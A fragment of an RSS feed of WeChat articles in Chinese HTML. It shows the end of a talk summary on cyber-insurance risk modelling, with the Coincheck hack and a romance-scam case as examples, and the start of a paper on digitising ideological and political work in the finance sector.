black;">人员管理风险的瞬时风险率，有一个基准，Φ和1-Φ分别代表攻击和防守，不是真正的进攻和防守，而是意识。<o:p></o:p></span></p><p><span style="font-size: 14px;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(250, 0, 0);">意识可以使攻击者、防御者的知识集的不对称平衡倾斜</span><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="font-size: 14px;"><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">红色的危险集是别人想知道你的情况，包括别人可以收集到的你的基本信息、公开演讲内容，甚至包括表情，都可以用来攻击你。<o:p></o:p></span></p></li><li style="font-size: 14px;"><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">隐私集是你自己是不是意识到了别人要骗你，意识到了有这种骗法。<o:p></o:p></span></p></li></ul><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">这些是可以量化的，对于危险集和隐私集可以做很多案例。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000309" data-ratio="0.6487119437939111" data-type="png" data-w="854" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e0ac713f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicSia6stOnlWOqOloZzyO45qp6Gjj0xm5or2aHR15vsAVK0iaKsfs6EnMw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">2. </span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">模型的直观示例</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">真正的诈骗不是一天两天完成的，是一个长期过程，美国德州一位女士，损失了几百万美元。有个人一直收集她facebook上的信息，和她谈情说爱就特别顺畅，让她心花怒放，觉得“世界上唯一了解我的就是他”，把感情寄托给他，也把钱转给他。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">积蓄、感情被骗走，是哑巴吃黄连，是一种羞辱。好的保险产品，事前事中有评估检测服务，事后能安抚、引导、咨询，能减轻损失。<o:p></o:p></span></p><section style="margin-bottom: 8px;"><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">（四）技术与非技术双因子</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);"><o:p></o:p></span></strong></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 融合技术和非技术两个风险评估因子<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 技术因子:系统防护能力测试<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 非技术因子:人员培训、流程管控等<o:p></o:p></span></section><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">1</span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">．起码要考虑两种风险因子</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">保险模型：根据新加坡项目经验，光技术是不够的，你花很多钱买网安软件，最后可能还是不行，因为要有人会用、会运营，要知道什么资产最重要，要保护哪些资产，最核心的部分怎么保护。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">双因子，技术层面如外围测试、加固防护，非技术层面包括人员与流程、预算、投入、隐私集和危险集双圈。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000310" data-ratio="0.6781065088757396" data-type="png" data-w="845" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=e7288248&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicrK14d49BSbCxoPTz4GXL04zq3ocYibTXichyUYl7xfhEFg9awaiaNnx9A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;letter-spacing: 0.034em;"><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">2. </span></strong><strong style="font-size: 14px;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(91, 155, 213);">风险因子的直观示例</span></strong></span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">感情诈骗和技术因素关系不大，更多是人员与流程、社交媒体的暴露信息。<o:p></o:p></span></p></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">勒索病毒与技术的关系就很明显。</span></p><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></p></li></ul><p style="margin-bottom: 8px;"><span style="font-size: 18px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">（五）案例驱动理论创新和验证 </span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);"><o:p></o:p></span></strong></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 模型建立过程中大量引用典型案例<o:p></o:p></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 如Coincheck黑客入侵、缅甸诈骗产业园等<o:p></o:p></span></p><p style="margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">- 案例推动理论模型的创新、验证和优化<o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">1.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">    </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">模型的直观示例</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">案例：日本Coincheck比特币交易所，2014年成立，顶级的IT团队和IT投入。前期运行平稳，结果在2017年底比特币价格飙升，所有媒体聚焦，暴露在大众和黑客的视线里。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000311" data-ratio="0.6764705882352942" data-type="png" data-w="850" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=f2f449cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicTDLB64vCwRfFJuEgiaqgojGeF7VS71MTibQYZdfSv2iagJeicwvqv8Mxlg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">根据进攻和防守的力度和媒体曝光的粒度结合起来，发现瞬时攻破率就上去了，像百岁老人迟早会出问题一样，瞬时风险率就可以把攻破时间预测出来。黑客是哪里有钱去哪里，有个小团队，花了2-3个月时间讨论如何攻破coincheck，2018日本coincheck被攻击，损失5亿美元。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">根据进攻-防守的瞬时风险率函数，资产价值上市，瞬时攻破率就上去了，可以预测攻击时间。实际上只要黑客想攻击，除非你把网络切断，否则是很难防住的，最好的办法是不要成为黑客的目标。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000312" data-ratio="0.7075471698113207" data-type="png" data-w="848" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ec36a6c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicNfzPqbiaribHrhEecvlSfpzp8k9se3ghZ0hsSTxP8Rm4XIPsHm2BQpug%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">2.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">   </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: 0em;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">模型的要求和挑战</span></strong></span></p><p><span style="font-size: 14px;color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;, sans-serif;letter-spacing: 0.578px;text-wrap: wrap;">总的来说,建立有效的网络安全保险风险模型,需要考虑供应链风险、信任机制、服务模式以及适当的保额设置,并将保险与安全技术服务相结合,以达到真正风险转移的目的。这对模型的设计提出了诸多挑战和要求。</span></p><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="text-align: left;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">供应链风险是关键挑战<o:p></o:p></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">美国银行的首席风险官虽然对自身系统有信心,但更担心上千家供应商的网络安全风险。他希望保险界能设计出允许供应商投保的产品,以转移风险。<o:p></o:p></span></section></li><li><section style="text-align: left;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">单纯的认证无法满足要求<o:p></o:p></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">简单地对供应商进行网络安全认证是不够的,因为认证过程很容易被轻易通过,无法真正保证安全性。需要有担保机制来确保认证的可信度。<o:p></o:p></span></section></li><li><section style="text-align: left;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">保险需要与安全服务相结合<o:p></o:p></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">网络安全保险不应仅限于赔付,更应提供风险评估、监测、事件响应等增值服务,全方位防范和降低风险。<o:p></o:p></span></section></li><li><section style="text-align: left;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">保额需与实际防护措施相匹配<o:p></o:p></span></section><section style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">保险金额不能过高,否则会为黑客攻击提供经济动机。保额应与被保企业真实的安全投入和防护能力相匹配。<o:p></o:p></span></section></li></ul><section style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><br/></span></section><p><span style="font-size: 16px;"><strong style="font-size: 14px;text-align: left;text-indent: -18pt;letter-spacing: 0.034em;"><span lang="EN-US" style="font-size: 16px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">3.<span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;font-kerning: auto;font-optical-sizing: auto;font-feature-settings: normal;font-variation-settings: normal;font-weight: normal;font-stretch: normal;font-family: &#34;Times New Roman&#34;;">   </span></span></strong><strong style="font-size: 14px;text-align: left;text-indent: -18pt;letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(60, 135, 205);">首单网安保险案例</span></strong></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">这是本场演讲之后的一个案例，管中窥豹。<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000313" data-ratio="0.7505882352941177" data-type="png" data-w="850" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=6cc97bc0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlickicfmlM0BqowXwyFRRzOA815xgM0kRE2Ppa8g8FL7HgB40plibc0pU4g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000314" data-ratio="0.751458576429405" data-type="png" data-w="857" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=ded770fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicXxicOmmhum7a273zjzJTb1qloa5nbr2W2g6m6IMCz5Qq9LhpxWs0pfQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/><o:p></o:p></span></p><p><span style="font-size: 20px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);">三、王教授寄语</span></strong></span><span style="font-size: 14px;"><strong><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(30, 78, 121);"><o:p></o:p></span></strong></span></p><p><span style="font-size: 14px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">保险产品和安全要好好结合，打造生态，在数字化、人工智能时代、网络安全、数字安全增长会越来越快，大家走在一起，打造生态，应用技术，让保险成为安全、安详、放心的社会做出贡献。</span><span lang="EN-US" style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;"><o:p></o:p></span></span></p><p style="margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483963">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a56ffec7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483963%26idx%3D1%26sn%3D0a90b8cb98498d12d22835c0d28424cf%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 05 Mar 2024 22:09:00 +0800</pubDate>
    </item>
    <item>
      <title>跨界融合，让思想文化更贴近当代人</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483918&amp;idx=1&amp;sn=f0414f7f6762a04a08909e9a3f98981a</link>
      <description>许多人陷入漩涡跟着卷,也有人愿意在远方挥一挥智慧之光，让思想文化更贴近当代人。</description>
      <content:encoded><![CDATA[<p>
原创 <span>三人行</span> <span>2024-03-01 18:26</span> <span style="display: inline-block;">上海</span>
</p>

<p>许多人陷入漩涡跟着卷,也有人愿意在远方挥一挥智慧之光，让思想文化更贴近当代人。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=ec8a2491&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxYls33hcCdtfalkqBs8reBAvaAEH6EpGc0KYI0icG2zq9mOJ3dz70eWfsxHdD8CZboJh46FvMpncA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000269" data-ratio="0.562037037037037" data-s="300,640" data-type="jpeg" data-w="1080" style="letter-spacing: 0.578px;text-align: left;width: 253px;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=844d9f44&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxYls33hcCdtfalkqBs8reBTKp2rW512RtWRVkYsSg69Iicp4aLUJscWKxRsdFKX1YQSzeEODl0YQQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p><span style="font-size:11.0pt;font-family:黑体;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">引子</span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">为了实践“让思想文化更贴近当代人”,我们走出老本行研发圈子，首次跨界发表论文,荣获全国金融系统思想政治工作和文化建设调研成果优秀奖的表彰。</span><span style="color: black;font-family: 仿宋;font-size: 11pt;letter-spacing: 0.034em;">在这个变化多端的时代,许多人陷入漩涡跟着卷,也有人愿意在远方挥一挥智慧之光，在调研和撰写过程中,我们得益于敏捷精益、研发幸福、人工智能、安全、数字化等社区专家、书友的启发鼓励,以及单位领导的帮助,逐步找到了更通俗易懂的视角和语言表达。道阻且长,我们当继续前行,用朴实语言讲好当代故事。</span></p><p style="margin-right: 0in;margin-bottom: 0px;margin-left: 0in;letter-spacing: 0.578px;text-wrap: wrap;font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;color: black;"><span style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;">---</span></p><p style="text-align: center;"><strong><span style="font-size:16.0pt;font-family:华文中宋;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">创新技法  </span></strong><strong><span style="font-size:16.0pt;font-family:华文中宋;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:
&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">传承精神</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:华文中宋;color:black;mso-themecolor:text1;"><o:p></o:p></span></strong></p><p style="text-align: center;"><strong><span style="font-size:16.0pt;font-family:华文中宋;mso-ascii-font-family:&#34;Times New Roman&#34;;mso-hansi-font-family:&#34;Times New Roman&#34;;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">数字化赋能金融基层思想政治工作</span></strong></p><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;">摘要</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;letter-spacing: 0.578px;font-size: 12px;">一、前言</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;letter-spacing: 0.034em;font-size: 12px;">二、金融业特点及思想政治工作面临的挑战</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;">三、实证研究</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;"> （一）数字化行为监测实现思想动态的实时感知</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;"> （二）大数据分析提升员工反馈评价的客观准确性</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;"> （三）人工智能实现创新理念的导入和落地</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;"> （四）数字化开启思想政治工作成效观测的新视野</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;">四、总结和体会</span></section><section style="margin-bottom: 8px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: 仿宋;font-size: 12px;">参考文献</span></section><p><span style="font-size: 11pt;font-family: 仿宋;"><br/></span><span style="color: black;font-family: 黑体;letter-spacing: 0.034em;font-size: 18px;">摘要</span></p><p><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">本文分析金融业的特点及思想政治工作面临的挑战，通过数字化手段开展了</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">4</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">项实证研究。首先,数字监测实现思想动态的实时捕捉;其次,大数据分析提升员工反馈评价的客观准确性;再次,人工智能实现创新理念的导入和落地;最后,数字化开启成效观测的新视野。研究表明,创新技法易,传承精神难,数字化技术是有效的工具和手段,但传承思想政治工作的传统精神更为核心。</span></p><section style="letter-spacing: 0.578px;text-wrap: wrap;margin-top: 0px;margin-bottom: 8px;"><span style="color: black;font-family: 黑体;letter-spacing: 0.034em;font-size: 18px;">一、前言</span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">习近平总书记曾多次强调：“金融安全是国家安全的重要组成部分，是经济平稳健康发展的重要基础。”做好金融系统思想政治工作是维护金融安全的根本前提，金融的重要作用和高度政治属性决定其思想政治工作的重要性。<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">本文分析了金融业的特点及思想政治工作面临的挑战,通过</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">4</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">项数字化实证研究, 探索运用数字化手段提升金融基层思想政治工作质量和水平的路径,以更好地为金融工作提供思想保证和精神动力。<o:p></o:p></span></section><p><span style="font-family: 黑体;color: black;font-size: 18px;">二、金融业特点及思想政治工作面临的挑战</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">金融业存在劳动产出抽象、业务专业性强、多种理念并存以及科技应用广泛等特征, 金融从业人员主要进行脑力劳动,其工作状态影响金融业务运行稳定。具体而言,基于以下特点,思想政治工作面临新挑战、新课题:<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">首先,业务抽象性强,内部流程复杂,产出难量化,给工作的感知和评价带来难度。<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">其次,知识更新快,信息量大，不同岗位高度协作,需要更贴近一线员工、了解一线情况，及时掌握员工思想动向。<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">再次,新工具新理念应用广泛，多种理念并存,需要通过思想政治工作推动理念与实践有效结合。<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">最后,在科技与金融深度融合的新趋势下,思想政治工作需要实现数字化转型。<o:p></o:p></span></section><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">综上,需要基层从实际工作出发，深入分析金融工作特点和规律,运用数字化等创新技术,以提升思想政治工作针对性和有效性。<o:p></o:p></span></section><p><span style="font-family: 黑体;color: black;font-size: 18px;">三、实证研究</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:黑体;color:black;mso-themecolor:text1;"><o:p></o:p></span></p><section style="margin-bottom: 8px;"><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">为应对上述金融系统思想政治工作的挑战,贯彻落实党中央在《关于新时代加强和改进思想政治工作的意见》中提出的“加强企业思想政治工作，把思想政治工作同生产经营管理、人力资源开发、企业精神培育、企业文化建设等工作结合起来，在思想上解惑、精神上解忧、文化上解渴、心理上解压”的要求，本文采用数字孪生技术，基于金融基层研发人员办公和研发工作环境的海量数据，积累了约</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">1</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">亿条记录，</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">1000</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">个字段的信息，相关数据内容及技术背景详见[1][2]。以上述信息作为调研基础，结合</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:black;mso-themecolor:text1;">6</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">个实际案例的具体需求，进行了</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;">4</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:
text1;">项实证研究:<o:p></o:p></span></section><ol style="list-style: none;" class="list-paddingleft-1"><li><section style="text-indent: 0cm;margin-bottom: 8px;"><span lang="EN" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
仿宋;color:black;mso-themecolor:text1;mso-ansi-language:EN;">1.</span><span style="font-size:11.0pt;font-family:仿宋;mso-bidi-font-family:&#34;Times New Roman&#34;;color:black;mso-themecolor:text1;">数字监测实现思想动态实时捕捉<o:p></o:p></span></section></li><li><section style="text-indent: 0cm;margin-bottom: 8px;"><span lang="EN" style="font-size:11.0pt;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:
